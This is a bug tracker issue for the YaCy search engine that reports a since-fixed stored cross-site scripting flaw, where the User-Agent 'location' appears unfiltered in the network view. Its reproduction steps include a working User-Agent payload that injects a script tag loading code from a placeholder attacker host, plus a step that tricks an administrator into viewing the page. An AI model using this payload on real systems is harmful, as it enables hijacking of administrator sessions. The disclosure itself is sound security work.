View Issue Details [ Jump to Notes ] | [ Issue History ] [ Print ] |
ID | Project | Category | View Status | Date Submitted | Last Update |
0000204 | YaCy | Wishlist - Wunschliste | public | 2012-08-03 23:08 | 2021-10-13 05:44 |
|
Reporter | soultcer | |
Assigned To | Lotus | |
Priority | normal | Severity | minor | Reproducibility | have not tried |
Status | resolved | Resolution | fixed | |
ETA | none | |
Platform | | OS | | OS Version | |
Product Version | YaCy 1.0 | |
Target Version | | Fixed in Version | YaCy 1.1 | |
|
Summary | 0000204: XSS attack YaCy peers using modified User-Agent string |
Description | YaCy extracts the "location" from the User-Agent string. This "location" is displayed without any filter in the network view. |
Steps To Reproduce | 1) Modify rogue YaCy instance to report it's own User-Agent as 'yacybot (freeworld/global; <script type="text/javascript" src="http://badsite.example/xss.js"></script> [^])'
2) Contact target peer with rogue YaCy instance.
3) Trick administrator of target peer to visit his network view. |
Tags | No tags attached. |
|
Attached Files | |
|